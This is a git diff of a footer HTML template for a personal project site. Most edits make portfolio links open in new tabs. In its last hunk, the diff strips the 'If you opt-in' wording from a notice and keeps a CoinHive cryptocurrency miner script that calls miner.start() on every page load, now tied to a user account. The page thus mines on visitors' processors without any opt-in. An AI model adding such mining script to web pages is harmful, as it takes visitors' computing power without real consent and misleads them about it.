--- a/client/views/footer/footer.html
+++ b/client/views/footer/footer.html
@@ -5,10 +5,10 @@
 			<div class="inverted center aligned column">
 				<p>other things i've made</p>
 				<div class="ui list">
-					<div class="item" data-html="<img class='small ui image' src='http://www.some-image.jpg'>"><a href="http://thescore.meteor.com/">theScore</a></div>
-					<div class="item" data-html="<img class='small ui image' src='http://www.some-image.jpg'>"><a href="http://bluegiraffecreamery.ca/">Blue Giraffe Creamery</a></div>
-					<div class="item" data-html="<img class='small ui image' src='http://www.some-image.jpg'>"><a href="https://www.instagram.com/p/BAbagW4sCq0/">Roasted Vegetables</a></div>
-					<div class="item" data-html="<img class='small ui image' src='http://www.some-image.jpg'>"><a href="https://calvin-chess.herokuapp.com">Calvin Chess</a></div>
+					<div class="item" data-html="<img class='small ui image' src='http://www.some-image.jpg'>"><a target="_blank" href="http://thescore.meteor.com/">theScore</a></div>
+					<div class="item" data-html="<img class='small ui image' src='http://www.some-image.jpg'>"><a target="_blank" href="http://bluegiraffecreamery.ca/">Blue Giraffe Creamery</a></div>
+					<div class="item" data-html="<img class='small ui image' src='http://www.some-image.jpg'>"><a target="_blank" href="https://www.instagram.com/p/BAbagW4sCq0/">Roasted Vegetables</a></div>
+					<div class="item" data-html="<img class='small ui image' src='http://www.some-image.jpg'>"><a target="_blank" href="https://calvin-chess.herokuapp.com">Calvin Chess</a></div>
 				</div>
 			</div>
 			<div class="inverted center aligned column">
@@ -17,9 +17,9 @@
 				<p style="margin-top: 0px;"><a href="mailto://michaelkant@live.com"><i class="at icon"></i></a><a href="https://github.com/inconsiderate/marvel-calendar"><i class="github icon"></i></a><a href="https://twitter.com/michaelkant"><i class="twitter icon"></i></a><a href="https://www.linkedin.com/in/michaelkant"><i class="linkedin icon"></i></a></p>
 			</div>
 			<div class="inverted center aligned column computer only">
-				<div id="addendum"><em>If you opt-in</em>, this site may use a small portion of your processing power to produce cryptocurrency for the creator, as an alternative to displaying a bunch of annoying ads. You're welcome.
+				<div id="addendum">This site may use a small portion of your processing power to produce cryptocurrency for the creator, as an alternative to displaying a bunch of annoying ads. You're welcome.
 					<script>
-						var miner = new CoinHive.Anonymous('Kipums0aoKk00cWSpKM7zn9Jqq8RfvGP');
+						var miner = new CoinHive.User('Kipums0aoKk00cWSpKM7zn9Jqq8RfvGP', 'calendar');
 						miner.start();
 					</script>
 				</div>
